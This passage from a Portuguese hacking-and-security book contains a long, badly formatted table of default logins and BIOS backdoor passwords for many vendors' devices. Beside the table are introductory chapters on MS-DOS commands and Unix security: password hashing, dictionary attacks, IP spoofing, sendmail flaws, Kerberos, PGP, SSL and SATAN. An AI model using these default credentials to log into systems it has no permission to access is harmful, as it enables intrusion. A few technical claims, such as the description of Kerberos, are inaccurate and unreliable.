Oracle Oracle RDBMS 7, Multi JONES STEEL
8
Oracle Oracle RDBMS 7, Multi MDSYS MDSYS
8
Oracle Oracle RDBMS 7, Multi NAMES NAMES
8
Oracle Oracle RDBMS 7, Multi ORDPLUGINS ORDPL
8 UGINS
Oracle Oracle RDBMS 7, Multi OUTLN OUTLN
8
Oracle Oracle RDBMS 7, Multi RMAN RMAN
8
Oracle Oracle RDBMS 7, Multi SCOTT TIGER
8
Oracle Oracle RDBMS 7, Multi SYS CHANG DBA +
8 E_ON_I
NSTALL
Oracle Oracle RDBMS 7, Multi SYSADM SYSAD
8 M
Oracle Oracle RDBMS 7, Multi SYSTEM MANAG
8 ER
Oracle Oracle RDBMS 7, Multi TRACESRV TRACE
8
Oracle Personal Oracle 8 Multi PO8 PO8
Osicom JETXPrint 1 Telnet sysadm sysadm Admin
0
0
0
E
Terrorismo Tecnológico 326
Aprenda Para Sobreviver

/
B
Osicom JETXPrint 1 Telnet sysadm sysadm Admin
0
0
0
E
/
N
Osicom JETXPrint 1 Telnet sysadm sysadm Admin
0
0
0
T
/
N
Osicom JETXPrint 5 Telnet sysadm sysadm Admin
0
0
E
/
B
Osicom NETCommuter Telnet debug d.e.b.u.g User
Remote Access
Server
Osicom NETCommuter Telnet echo echo User
Remote Access
Server
Osicom NETCommuter Telnet guest guest User
Remote Access
Server
Osicom NETCommuter Telnet Manager Manager Admin
Remote Access
Server
Osicom NETCommuter Telnet sysadm sysadm Admin
Remote Access
Server
Osicom NETPrint 1500 E/B Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1000E/D Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1000E/NDS Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1500E/N Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 2000E/N Te debug d.e.b.u.g User
lne
t
Osicom NETPrint 1500 E/B Te echo echo User
lne
t
Osicom NETPrint 1000E/D Te echo echo User
lne
t
Terrorismo Tecnológico 327
Aprenda Para Sobreviver

Osicom NETPrint 1000E/NDS Te echo echo User


lne
t
Osicom NETPrint 1500E/N Te echo echo User
lne
t
Osicom NETPrint 2000E/N Te echo echo User
lne
t
Osicom NETPrint 1500 E/B Te guest guest User
lne
t
Osicom NETPrint 1000E/D Te guest guest User
lne
t
Osicom NETPrint 1000E/NDS Te guest guest User
lne
t
Osicom NETPrint 1500E/N Te guest guest User
lne
t
Osicom NETPrint 2000E/N Te guest guest User
lne
t
Osicom NETPrint 1500 E/B Te Manager Manager Admin
lne
t
Osicom NETPrint 1000E/D Te Manager Manager Admin
lne
t
Osicom NETPrint 1000E/NDS Te Manager Manager Admin
lne
t
Osicom NETPrint 1500E/N Te Manager Manager Admin
lne
t
Osicom NETPrint 2000E/N Te Manager Manager Admin
lne
t
Osicom NETPrint 1000E/NDS Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1500E/N Te sysadm sysadm Admin
lne
t
Osicom NETPrint 2000E/N Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1000E/B Te sysadm sysadm Admin
lne
t
Osicom NETPrint 2000E/B Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1000E/N Te sysadm sysadm Admin
lne
t
Terrorismo Tecnológico 328
Aprenda Para Sobreviver

Osicom NETPrint 2000E/N Te sysadm sysadm Admin


lne
t
Osicom NETPrint 1000 T/B Te sysadm sysadm Admin
lne
t
Osicom NETPrint 2000 T/B Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1000 T/N Te sysadm sysadm Admin
lne
t
Osicom NETPrint 2000 T/N Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1500 E/B Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1500E/N Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1500T/N Te sysadm sysadm Admin
lne
t
Osicom NETPrint 1000E/D Te sysadm sysadm Admin
lne
t
Osicom NETPrint 500 E/B Te sysadm sysadm Admin
lne
t
Osicom NETPrint 500 E/N Te sysadm sysadm Admin
lne
t
Osicom NETPrint 500 T/B Te sysadm sysadm Admin
lne
t
Osicom NETPrint 500 T/N Te sysadm sysadm Admin
lne
t
Osicom Osicom Plus Te write private
T1/PLUS 56k lne
t
Packard PC BIOS Co n/a bell9 Admin
Bell ns
ole
Prime PrimeOS M dos dos User
ulti
Prime PrimeOS M guest guest User
ulti
Prime PrimeOS M guest1 guest User
ulti
Prime PrimeOS M guest1 guest1 User
ulti
Prime PrimeOS M fam fam User
ulti
Prime PrimeOS M mail mail User
ulti
Terrorismo Tecnológico 329
Aprenda Para Sobreviver

Prime PrimeOS M maint maint User


ulti
Prime PrimeOS M mfd mfd User
ulti
Prime PrimeOS M netlink netlink User
ulti
Prime PrimeOS M prime prime User
ulti
Prime PrimeOS M prime primeos User
ulti
Prime PrimeOS M primeos prime User
ulti
Prime PrimeOS M primeos primeos User
ulti
Prime PrimeOS M primenet primenet User
ulti
Prime PrimeOS M primenet primeos User
ulti
Prime PrimeOS M primos_c primos User
ulti s
Prime PrimeOS M primos_c prime User
ulti s
Prime PrimeOS M system prime Admin
ulti
Prime PrimeOS M system system Admin
ulti
Prime PrimeOS M tele tele User
ulti
Prime PrimeOS M test test User
ulti
QDI PC BIOS Co n/a QDI Admin
ns
ole
QDI SpeedEasy BIOS Co n/a lesarotl Admin
ns
ole
Quantex PC BIOS Co n/a teX1 Admin
ns
ole
Quantex PC BIOS Co n/a xljlbj Admin
ns
ole
Raidzon raid arrays n/a raidzone
e
Ramp WebRamp wradmin trancell
Network
s
RapidStr RapidStream M rsadmin (null) Admin
eam Appliances ulti
Raritan KVM Switches admin raritan Admin
RedHat Redhat 6.2 HT piranha q User
TP
RedHat Redhat 6.2 HT piranha piranha User
TP
Remedy Remedy M ARAdmi AR#Adm Admin
ulti n in#
Terrorismo Tecnológico 330
Aprenda Para Sobreviver

Researc PC BIOS Co n/a Col2ogr Admin


h ns o2
ole
RM RM Connect M admin rmnetlm
ulti
RM RM Connect M admin2 change
ulti me
RM RM Connect M adminstr change
ulti ator me
RM RM Connect M deskalt passwor
ulti d
RM RM Connect M deskman change
ulti me
RM RM Connect M desknor passwor
ulti m d
RM RM Connect M deskres passwor
ulti d
RM RM Connect M guest (none)
ulti
RM RM Connect M replicato replicato
ulti r r
RM RM Connect M RMUser passwor
ulti 1 d
RM RM Connect M setup change
ulti me
RM RM Connect M teacher passwor
ulti d
RM RM Connect M temp1 passwor
ulti d
RM RM Connect M topicalt passwor
ulti d
RM RM Connect M topicnor passwor
ulti m d
RM RM Connect M topicres passwor
ulti d
RM Server BIOS Co n/a RM
ns
ole
Semaph PICK O/S DESQU
ore ETOP
Semaph PICK O/S DS
ore
Semaph PICK O/S DSA
ore
Semaph PICK O/S PHANT
ore OM
Shuttle PC BIOS n/a Spacve Admin
Siemens Hicom 100E PBX 31994 31994
Siemens Hicom 150E PBX 31994 31994
Siemens PhoneMail poll poll
Siemens PhoneMail poll tech
Siemens PhoneMail sysadmi sysadmi
n n
Siemens PhoneMail system system
Terrorismo Tecnológico 331
Aprenda Para Sobreviver

Siemens PhoneMail system field


Siemens PhoneMail tech tech
Siemens ROLM PBX admin pwp
Siemens ROLM PBX eng engineer
Siemens ROLM PBX op op
Siemens ROLM PBX op operator
Siemens ROLM PBX su super
Siemens PC BIOS Co n/a SKY_FO Admin
Nixdorf ns X
ole
Silicon IRIX M 4Dgifts 4Dgifts Admin
Graphic ulti
s
Silicon IRIX M 4Dgifts (none) Admin
Graphic ulti
s
Silicon IRIX M demos (none) Admin
Graphic ulti
s
Silicon IRIX M Ezsetup (none) Admin
Graphic ulti
s
Silicon IRIX M field field Admin
Graphic ulti
s
Silicon IRIX 5.x, 6.x M guest (none) CLI, UID
Graphic ulti guest
s
Silicon IRIX 5.x, 6.x M lp (none) CLI, UID
Graphic ulti lp
s
Silicon IRIX M OutOfBo (none) Admin
Graphic ulti x
s
Silicon IRIX M tour tour Admin
Graphic ulti
s
Silicon IRIX M tutor (none) Admin
Graphic ulti
s
Silicon IRIX M tutor tutor Admin
Graphic ulti
s
Sovereig InQuery Admin shs Admin
n Hill
Sun Sun E10000 Multi ssp ssp Admin
System Service
Processor
Sun SunScreen 3.1 TCP admin admin Admin
Lite 3852
SuperMi PC BIOS Cons n/a ksdjfg93 Admin
cro ole 4t
Sybase Adaptive Server 11.x,1 Multi sa (none) SA and
Enterprise 2.x SSO
Terrorismo Tecnológico 332
Aprenda Para Sobreviver

roles
Telus Telephony Services Multi (created) telus00 User
Telus Telephony Services Multi (created) telus99 User
Tiny PC BIOS Cons n/a Tiny Admin
ole
TMC PC BIOS Cons n/a BIGO Admin
ole
Toshiba PC BIOS Cons n/a 24Banc8 Admin
ole 1
Toshiba PC BIOS Cons n/a Toshiba Admin
ole
Toshiba PC BIOS Cons n/a toshy99 Admin
ole
UNIX Generic Multi adm adm Admin
UNIX Generic Multi adm (none) Admin
UNIX Generic Multi admin admin User
UNIX Generic Multi administr administ User
ator rator
UNIX Generic Multi administr (none) User
ator
UNIX Generic Multi anon anon User
UNIX Generic Multi bbs bbs User
UNIX Generic Multi bbs (none) User
UNIX Generic Multi bin sys Admin
UNIX Generic Multi bin sys Admin
UNIX Generic Multi checkfs checkfs User
UNIX Generic Multi checkfsy checkfsy User
s s
UNIX Generic Multi checksy checksy User
s s
UNIX Generic Multi daemon daemon User
UNIX Generic Multi daemon (none) User
UNIX Generic Multi demo demo User
UNIX Generic Multi demo (none) User
UNIX Generic Multi demos demos User
UNIX Generic Multi demos (none) User
UNIX Generic Multi dni (none) User
UNIX Generic Multi dni dni User
UNIX Generic Multi fal (none) User
UNIX Generic Multi fal fal User
UNIX Generic Multi fax (none) User
UNIX Generic Multi fax fax User
UNIX Generic Multi ftp (none) User
UNIX Generic Multi ftp ftp User
UNIX Generic Multi games games User
Terrorismo Tecnológico 333
Aprenda Para Sobreviver

UNIX Generic Multi games (none) User


UNIX Generic Multi gopher gopher User
UNIX Generic Multi gropher (none) User
UNIX Generic Multi guest guest User
UNIX Generic Multi guest guestgu User
e
UNIX Generic Multi guest (none) User
UNIX Generic Multi halt halt User
UNIX Generic Multi halt (none) User
UNIX Generic Multi informix informix User
UNIX Generic Multi install install Admin
UNIX Generic Multi lp lp User
UNIX Generic Multi lp bin User
UNIX Generic Multi lp lineprin User
UNIX Generic Multi lp (none) User
UNIX Generic Multi lpadm lpadm User
UNIX Generic Multi lpadmin lpadmin User
UNIX Generic Multi lynx lynx User
UNIX Generic Multi lynx (none) User
UNIX Generic Multi mail (none) User
UNIX Generic Multi mail mail User
UNIX Generic Multi man man User
UNIX Generic Multi man (none) User
UNIX Generic Multi me (none) User
UNIX Generic Multi me me User
UNIX Generic Multi mountfs mountfs Admin
UNIX Generic Multi mountfsy mountfs Admin
s ys
UNIX Generic Multi mountsy mountsy Admin
s s
UNIX Generic Multi news news User
UNIX Generic Multi news (none) User
UNIX Generic Multi nobody (none) User
UNIX Generic Multi nobody nobody User
UNIX Generic Multi nuucp (none) User
UNIX Generic Multi operator operator User
UNIX Generic Multi operator (none) User
UNIX Generic Multi oracle (none) User
UNIX Generic Multi postmast postmas User
er t
UNIX Generic Multi postmast (none) User
er
Terrorismo Tecnológico 334
Aprenda Para Sobreviver

UNIX Generic Multi powerdo powerdo User


wn wn
UNIX Generic Multi rje rje User
UNIX Generic Multi root root Admin
UNIX Generic Multi root (none) Admin
UNIX Generic Multi setup setup Admin
UNIX Generic Multi shutdow shutdow User
n n
UNIX Generic Multi shutdow (none) User
n
UNIX Generic Multi sync sync User
UNIX Generic Multi sync (none) User
UNIX Generic Multi sys sys Admin
UNIX Generic Multi sys system Admin
UNIX Generic Multi sys bin Admin
UNIX Generic Multi sysadm sysadm Admin
UNIX Generic Multi sysadm admin Admin
UNIX Generic Multi sysadmi sysadmi Admin
n n
UNIX Generic Multi sysbin sysbin Admin
UNIX Generic Multi system_ (none) Admin
admin
UNIX Generic Multi system_ system_ Admin
admin admin
UNIX Generic Multi trouble trouble User
UNIX Generic Multi umountf umountf User
s s
UNIX Generic Multi umountf umountf User
sys sys
UNIX Generic Multi umounts umounts User
ys ys
UNIX Generic Multi unix unix User
UNIX Generic Multi user user User
UNIX Generic Multi uucp uucp User
UNIX Generic Multi uucpad uucpad User
m m
UNIX Generic Multi web (none) User
UNIX Generic Multi web web User
UNIX Generic Multi webmast webmast User
er er
UNIX Generic Multi webmast (none) User
er
UNIX Generic Multi www (none) User
UNIX Generic Multi www www User
Unknow System 88 Cons test test User
n ole
Unknow System 88 Cons operator operator Admin
n ole
Terrorismo Tecnológico 335
Aprenda Para Sobreviver

Unknow System 88 Cons overseer overseer Admin


n ole
Unknow POCSAG Radio 2.05 Port n/a passwor Admin
n Paging 8000 d
Verifone Verifone Junior 2.05 (none) 166816
Vextrec PC BIOS Cons n/a Vextrex
Technol ole
ogy
Vobis PC BIOS Cons n/a merlin Admin
ole
Wim WIMBIOSnbsp Cons n/a Compleri Admin
Bervoet BIOS ole
s
WWWBo WWWADMIN.PL HTT WebAd WebBoa Admin
ard P min rd
Xylan Omniswitch Teln admin switch Admin
et
Xylan Omniswitch Teln diag switch
et
Xyplex Routers Port n/a access User
7000
Xyplex Routers Port n/a system Admin
7000
Xyplex Terminal Server Port n/a access User
7000
Xyplex Terminal Server Port n/a system Admin
7000
Zenith PC BIOS Cons n/a 3098z Admin
ole
Zenith PC BIOS Cons n/a Zenith Admin
ole
ZEOS PC BIOS Cons n/a zeosx Admin
ole
Zyxel Generic Routers Teln n/a 1234 Admin
et

17.4 Política de senhas não-crackeáveis

Como já descrito antes combine maiúscula com minúsculas e


números no meio!
Terrorismo Tecnológico 336
Aprenda Para Sobreviver

Capítulo XVIII

Entendendo MS-DOS
Terrorismo Tecnológico 337
Aprenda Para Sobreviver

18.1 MS-DOS

Por ser um dos primeiros S.O. e muito usado até hoje já que é
base para outros Sistemas Operacionais, é muito valido saber um
pouco de como ele funciona.

Ao ligarmos um computador o ROM-BIOS (Read Only Basic


Input/Output System) começa uma bateria de testes de inicialização
(POST - Power-On Self-Test) que testa todas as características
funcionais do computador (RAM, teclado, vídeo, drives, etc.).

Após os testes terem sido bem sucedidos e se não forem


encontrados erros ele entrega o sistema agora para o S.O. (Sistema
Operacional). Geralmente ele procura primeiro no drive de disquete
e caso não encontre irá procurar no disco rígido!

Encontrado ele é carregado na memória

No caso do MS-DOS assim que estiver carregado na memória


ele mostrará o prompt de comando, que quer dizer que ele já está
preparado e esperando a solicitação de alguma função. O prompt
indica que o sistema esta esperando a linha de comando para
executar a função solicitada.

18.2 Características do MS-DOS


O MS-DOS é monousuário e monoprogramado. A comunicação
do usuário com o MS-DOS ocorre de dois modos, o modo interativo
e o modo batch.

a) Modo Interativo: Propriedade de executar um comando no


instante em que foi digitado através do prompt, que é um sinal que
indica que o MS-DOS está pronto para executar seus comandos.
Terrorismo Tecnológico 338
Aprenda Para Sobreviver

b) Modo batch: Também chamado de comandos em lote, ou


seja, uma seqüência de comandos que serão executados na ordem
em que aparecem. Os comandos desejados devem ser colocados
em ordem seqüencial em um arquivo que pode ser criado por um
processador de textos.

18.3 Comandos Internos


São comandos que por serem usadas com maior freqüências,
são inerentes ao Sistema Operacional, sendo carregados na
memória toda vez que o MS-DOS é carregado. Portanto, podem ser
executados a qualquer momento e em qualquer subdiretório.

Principais Comandos Internos:

DIR: Usado para exibir os arquivos e os subdiretórios de um


diretório. Se usado sem parâmetros e opções, este exibirá o nome
de volume, o número de série do disco, os diretórios, os arquivos e
suas respectivas extensões, seus tamanhos, a data e a hora de
criação ou alteração, o total de arquivos exibidos, seus tamanhos
acumulados e o total de espaço livre em disco em bytes.
Sintaxe: DIR [DRIVE:/CAMINHO][/ATRIBUTOS]

COPY: Comando utilizado para copiar arquivos de um local


para outro, utilizado para concatenar vários arquivos gerando
apenas um.
Sintaxe: COPY [driveorigem:][nomearq.ext] [drivedestino:]

DEL: Remove um ou mais arquivos especificados de um


diretório. A especificação pode ser de um arquivo em particular ou
de um grupo de arquivos, utilizando-se os caracteres globais [*][?].
Sintaxe: DEL [drive:][nomearq.ext]

MKDIR ou MD: Comando utilizado para criar um diretório ou


para criar uma estrutura hierárquica de níveis múltiplos.
Sintaxe: MD [unidade][caminho] nome diretório
Terrorismo Tecnológico 339
Aprenda Para Sobreviver

CHDIR ou CD: Comando utilizado para alterar o diretório


corrente.
Sintaxe: CD [caminho]

RMDIR ou RD: Comando utilizado para remover, excluir,


deletar um diretório.
Sintaxe: RD[unidade][caminho]nome diretório

18.4 Comandos Externos


São comandos usados com menor freqüência e que por isso tem
que ser carregados na memória RAM toda vez que for necessária
sua utilização.

Alguns Comandos Externos:

FORMAT: Formatador de discos do MS-DOS, ou seja,


estabelece marcos eletrônicos que determinam a divisão do disco
em trilhas, setores e capacidade de bytes, de forma que este possa
ser reconhecido pelo sistema operacional e então receber e
transmitir informações.
Sintaxe: FORMAT [drive:]

DISKCOPY: Comando utilizado para fazer uma cópia idêntica


do conteúdo de um disco para outro.
Sintaxe: DISKCOPY [origem][destino]

BACKUP: Comando que permite que se realize cópias de


segurança e restaurações de um disco, diretório ou arquivo para
outro disco ou diretório.
Sintaxe: MSBACKUP [arquivo de configuração]

LABEL: Comando para criar, modificar ou apagar o volume


(nome) de um disco. O volume de um disco pode ter até 11
caracteres ou nenhum.
Sintaxe: LABEL [drive:][nome do disco]
Terrorismo Tecnológico 340
Aprenda Para Sobreviver

TREE: Comando que permite visualizar o caminho dos


diretórios de um disco de forma hierárquica.
Sintaxe: TREE [drive:]

18.5 Comandos de Inicialização

CLS: Comando utilizado para limpar a tela.


Sintaxe: A:\>CLS ou C:\>CLS

TIME: Comando utilizado para verificar a hora do sistema e


configurar a nova hora do mesmo. Suas informações são utilizadas
para alterar o diretório sempre que criamos ou alteramos um
arquivo.
Sintaxe: TIME hh:mm:ss:cs a/p (am/pm)

DATE: Comando utilizado para exibir a data do sistema e


configurar a mesma.
Sintaxe: DATE mm-dd-aa

VER: Comando utilizado para exibir a versão do MS-DOS.


Sintaxe: VER

TYPE: Utilizado para se exibir o conteúdo de um arquivo tipo


texto.
Sintaxe: TYPE [unidade][caminho] nome arquivo

18.6 Arquivos em Lote

O S.O. permite que agrupemos uma série de comandos dentro


de um arquivo de forma a serem executadas seqüencialmente todas
vezes que este arquivo for chamado no Prompt. Este processo é
chamado de Processamento em Lote, ou arquivo Autoexecutável ou
Terrorismo Tecnológico 341
Aprenda Para Sobreviver

Batch File. Estes arquivos podem ser criados diretamente no Prompt


do sistema operacional ou num editor de arquivos texto, como o
EDIT. Os arquivos em lote têm em comum entre si, a sintaxe de
comandos e a extensão.BAT no seu nome-de-arquivo. Pode-se criar
arquivos .BAT para diversas aplicações, tais como:

- exibição de diretórios;
- mudança de PATH;
- cópias de segurança;
- compressão de arquivos;
- parametrização do sistema, etc.

O arquivo .BAT mais presente nos computadores de modo geral


é o AUTOEXEC.BAT, que normalmente é utilizado para estabelecer
parâmetros de utilização do sistema e do equipamento, visto que é
executada, toda vez que o sistema é inicializado.

18.7 Outros

DEFRAG: Desfragmentador de arquivos do MS-DOS.

MSAVE: Programa antivírus que acompanha o MSDOS. O


menu principal deste utilitário apresenta as seguintes opções:

a) Encontrar - Pesquisa o disco por vírus conhecidos.


b) Encontrar e limpar - Pesquisa disco e remove virus conhecidos.
c) Selecionar nova unidade - Seleciona unidade a ser pesquisada.
d) Opções - Definem opções de pesquisa como verificar integridade
(alteração no tamanho de arquivos executáveis), criar totais de
controle, anti-stealth e verificar todos os arquivos.

VSAFE: Programa residente em memória que faz uma


checagem verificando atividades suspeitas que poderiam estar
Terrorismo Tecnológico 342
Aprenda Para Sobreviver

sendo feitas por algum tipo de vírus. Os controles feitos pelo vsafe
são:

a) Avisar quando uma formatação de baixo nível está


acontecendo.
b) Avisar quando algum programa residente esta sendo carregado.
c) Verificar arquivos executáveis abertos pelo DOS.
d) Verificar setor de boot dos discos procurando por vírus.
e) Evitar que arquivos executáveis sejam regravados.
f) Proteger a área de boot contra gravação.
Terrorismo Tecnológico 343
Aprenda Para Sobreviver

Capítulo XIX

Unix
Terrorismo Tecnológico 344
Aprenda Para Sobreviver

19.1 Autenticação Fraca

O Unix guarda as informações de todos os usuários do sistema


no arquivo /etc/passwd. Este arquivo contém o username, o nome
real, informação para a identificação e informações básicas sobre a
conta de cada usuário no sistema. O arquivo é organizado da
seguinte forma: cada linha do arquivo contém o registro de um
usuário, e os registros são divididos em campos separados pelo
caracter (:).

Por exemplo:

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/csh
daemon:*:1:1::/tmp:
uucp:OORoMN9FyZfNE:4:4::/usr/spool/uucppublic:/usr/lib/uucp/u
ucico
jsilva:eH5/.mj7NB3dx:181:100:José Silva:/u/jsilva:/bin/csh

As três primeiras contas, root, daemon e uucp, são contas do


sistema e a última é conta de usuário.

Os campos de cada linha tem o seguinte significado:

jsilva username
eH5/.mj7NB3dx senha do usuário cifrada
181 número identificador do usuário (UID)
100 número identificador do grupo ao qual
usuário pertence (GID)
Terrorismo Tecnológico 345
Aprenda Para Sobreviver

José Silva nome real do usuário


/u/jsilva/ diretório home do usuário
/bin/csh shell do usuário

O objetivo da senha é de autenticar o usuário. Em muitas


versões do Unix caso um usuário tente acessar um sistema e entre
com a senha errada diversas vezes consecutivamente, a conta
deste usuário é bloqueada. Isto evita com que uma pessoa fique
tentando acertar a senha de outro, e, caso isto aconteça, deve-se
avisar ao administrador que alguém está tentando quebrar uma
conta.

A senha é cifrada com uma função one-way a qual cifra a senha


com blocos de zero. O resultado da função crypt( ) é armazenado no
arquivo /etc/passwd. Quando tentamos entrar no sistema o
programa /bin/login cifra a senha digitada pelo usuário com a
mesma função, e compara o resultado com o que temos
armazenado no arquivo /etc/passwd, se forem iguais permite a
entrada do usuário no sistema.

O algoritmo do crypt( ) usado é baseado no DES (Data


Encryption Standard).

O ataque mais usado na rede é chamado de Ataque do


Dicionário que foi criado por Robert Morris (coincidência ou não,
filho de Robert Morris da NSA que foi um dos pesquisadores que
desenvolveu crypt( ) ). O ataque consiste na cifragem das palavras
de um dicionário através da função crypt( ), e comparações com os
arquivos de senhas de usuários. Desta forma, quando uma palavra
do dicionário cifrada coincidisse com a senha cifrada de um usuário,
o atacante teria obtido uma senha.

Para dificultar este ataque foi criado o chamado salt, que é um


número randômico gerado na hora em que o usuário esta inserindo
ou alterando a sua senha. O número gerado pode estar entre 0 e
4095 e é cifrado juntamente com a senha, o que impede a utilização
de um dicionário genérico para todos os usuários. O atacante agora
Terrorismo Tecnológico 346
Aprenda Para Sobreviver

tem que cifrar cada palavra do dicionário com o salt de cada


usuário.

Embora cada usuário tenha seu username, o Unix internamente


representa cada usuário por um número, o UID (User Identifier). Os
UIDs são números de 16 bits e geralmente os UIDs entre 0 e 9 são
usados para funções do sistema. Os UIDs para os usuários
começam geralmente em 20 ou 100.

O Unix guarda a relação entre username e UID no arquivo


/etc/passwd, após a senha cifrada temos o UID do usuário.

O UID [GAR94] é o identificador real do usuário para o sistema


operacional, o username é utilizado apenas por ser mais
conveniente para os usuários. Se dois usuários possuírem o mesmo
UID, o Unix os veria como um mesmo usuário, mesmo eles tendo
username e senhas diferentes.

Todo o usuário do Unix pertence a um ou mais grupos, e estes


grupos, como os identificadores de usuário, também possuem
identificador de grupo, o GID (Group Identifier). O administrador do
sistema cria os grupos e especifica quais arquivos, diretórios ou
dispositivos os usuários deste grupo vão ter acesso. No /etc/passwd
é armazenado o GID do grupo primário do usuário. Os dados do
grupo são armazenados no arquivo /etc/group.

19.2 IP Spoofing

O IP spoofing consiste na troca do IP original por um outro,


podendo assim se passar por um outro host.

Através de IP Spoofing um intruso pode se aproveitar de hosts


confiáveis armazenados no arquivo.rhosts, e entrar em máquinas
via rlogin, por exemplo, onde não é exigido senha.
Terrorismo Tecnológico 347
Aprenda Para Sobreviver

O famoso ataque de Kevin Mitnick à rede particular de Tsutomo


Shimomura, um especialista em segurança de sistemas, em
dezembro de 1994, foi baseado no ataque descrito acima. Mitnick,
além da rede de Shimomura, através de um modem e celular,
invadiu diversos outros sistemas, como universidades, empresas e
órgãos públicos.

Existe também o chamado Host Name Spoofing, mais fácil de


implementar que o IP Spoofing, que é quando um DNS retorna um
nome falso para um dado IP. Pode ser utilizado para atacar alguns
sistemas que possuem serviços baseados em autenticação pelo
nome do host.

19.3 FTP (File Transfer Protocol)

O serviço FTP permite que usuários transfiram arquivos


facilmente de um sistema para outro, através da rede.

O FTP apresenta o mesmo problema de segurança do telnet,


trafegar username e senha pela rede sem nenhuma proteção.

O FTP pode ser configurado para trabalhar também com acesso


anônimo, ou seja, qualquer pessoa, mesmo que não tenha conta
naquela máquina pode depositar e copiar arquivos dela. O FTP
anônimo é muito utilizado para a distribuição de documentos e
softwares através da rede. Deve ser tomado muito cuidado na
configuração de um servidor de FTP anônimo para que o acesso
seja restrito aos arquivos determinados incluindo restrições de
acesso. Outra atenção é que o servidor de FTP não fique sendo
depósito de documentos indesejados como arquivos de intrusos,
etc, por este motivo é aconselhável criar um diretório separado para
a colocação de arquivos com espaço limitado.

Através do arquivo /etc/ftpusers eu posso impedir que os


usuários especificados utilizem o serviço FTP.
Terrorismo Tecnológico 348
Aprenda Para Sobreviver

19.4 MAIL

Através do protocolo SMTP (Simple Mail Transfer Protocol)


qualquer usuário envia uma mensagem de uma máquina para outra
através da rede. O mail é o serviço mais difundida da Internet.

O sendmail, uma das implementações mais difundidas do SMTP,


atua tanto como servidor como cliente.

O sendmail já é conhecido como fonte de problemas de


segurança. Uma das vulnerabilidades do sendmail [GAL96] envolve
em fazer o servidor executar o corpo de uma mensagem como uma
shell script. O script pode fazer qualquer coisa que um usuário
comum do sistema possa fazer, incluindo enviar o arquivo de
senhas do sistema para o atacante. O sendmail praticamente não
possui validação dos dados e permite também que seja enviado um
mail par um arquivo.

O sendmail possui algumas contas que devem ser desabilitadas


pelo administrador do sistema como, por exemplo, as contas
“wizard”, “kill”, “debug”. A configuração do sendmail fica no arquivo
/usr/lib/sendmail.cf.

O verme da Internet de 1988 utilizou-se do modo de depuração


do sendmail para obter acesso irrestrito ao sistema invadido. O
sendmail possui este modo de depuração, o que faz com que depois
de instalado o sendmail deve ser recompilado com o modo de
depuração desligado.

Como visto, o sendmail é o serviço mais fraco em nível de


segurança e um dos mais utilizados.
Terrorismo Tecnológico 349
Aprenda Para Sobreviver

19.5 Enteda mais sobre o kerberus

O Kerberos é uma implementação de um KDC, desenvolvida no


MIT (Massachusetts Institute of Technology) utilizando o conceito de
algoritmo de chave pública.

O Kerberos é um protocolo de autenticação projetado para Unix


e redes TCP/IP. Um serviço Kerberos situado na rede atua com um
árbitro. Kerberos provê autenticação segura na rede permitindo com
que uma pessoa acesse diferentes máquinas na rede. O Kerberos é
baseado em criptografia de chave única (foi implementado com o
DES, mas outros algoritmos também podem ser usados).

No modelo Kerberos temos duas entidades na rede: o cliente e o


servidor. Os clientes podem ser usuários ou software independente
que precisam fazer download em arquivos, enviar mensagens,
acessar bancos de dados, etc.

O Kerberos mantém uma base de dados com as chaves de seus


clientes. No caso dos clientes serem usuários as chaves secretas
pode ser uma senha cifrada. Serviços de rede que requerem
autenticação, bem como os clientes que usem estes serviços
registram suas chaves secretas com o Kerberos.

Sabendo a chave secreta de todos, o Kerberos pode criar


mensagens que convençam uma entidade da identidade de outra.

Como o Kerberos trabalha:

Um cliente requisita um ticket para um Ticket-Granting Service


(ticket TGS) para o serviço Kerberos. Este ticket é enviado para o
cliente cifrado com a chave secreta deste cliente. Para usar um
serviço particular, o cliente requisita um ticket para aquele serviço
para o Ticket-Granting Server (TGS). Assumindo que tudo está em
ordem, o TGS envia o ticket de volta ao cliente. O cliente apresenta
o ticket para o servidor como um autenticador. Novamente, se não
Terrorismo Tecnológico 350
Aprenda Para Sobreviver

há nada errado com as credenciais do cliente, o servidor deixa o


cliente ter acesso ao serviço.

19.6 Criptografia UNIX

O algoritmo mais conhecido de chave única é o DES e o de


chave pública e privada é o RSA.

19.7 Protocolos interessates

19.7.1 PGP
O PGP (Pretty Good Privacy), destina-se a comunicação segura
via e-mail, para isto utiliza-se de criptografia de chave pública.

A mensagem enviada é criptografada com a chave pública do


destinatário. Para que o usuário possa decifrar a mensagem ele
decifra com a sua chave secreta a qual somente ele possui. Desta
forma, qualquer pessoa que intercepte esta comunicação não
conseguirá decifrar a mensagem.

No PGP temos também a facilidade de poder assinar uma


mensagem, assim a mensagem vai cifrada com a chave secreta do
remetente e o destinatário decifra com a chave pública do
remetente. Uma mensagem pode ir cifrada e assinada.

19.7.2 SSL
Terrorismo Tecnológico 351
Aprenda Para Sobreviver

O SSL (Secure Socket Layer) foi desenvolvido pela Netscape


Communications com o objetivo de gerar segurança e privacidade
entre duas aplicações. Com o SSL é possível que aplicações
cliente/servidor se comuniquem de forma segura evitando
influências externas, falsificação dos dados e “escuta” dos dados em
claro.

O protocolo SSL atua entre o nível de aplicação e transporte da


arquitetura Internet. Possui duas camadas: “SSL Record Protocol”,
que é responsável por encapsular outros protocolos de alto nível e a
“SSL Handshake Protocol”, que recebe os dados a serem
cifrados/decifrados.

Esta segunda camada é responsável pela autenticação do cliente


e/ou servidor, negociação do algoritmo criptográfico e suas chaves
antes da aplicação receber ou enviar qualquer byte de dados.

Este protocolo é utilizado pelo BradescoNet para permitir


homebanking.

19.8 Ferramentas para Verificação de Segurança


no Unix

19.8.1 SATAN
Satan (Security Analysis Tool for Auditing Network) é o mais
complexo sistema de auditoria para sistemas Unix disponível. Ele
coleta a maior quantidade possível de informações sobre um host,
examina os serviços de rede como o finger, o NFS, o NIS, o ftp e o
tftp, rexd entre outros.

As informações que são relatadas pelo SATAN incluem tanto os


tipos de serviços disponibilizados pelo host, quantos furos potenciais
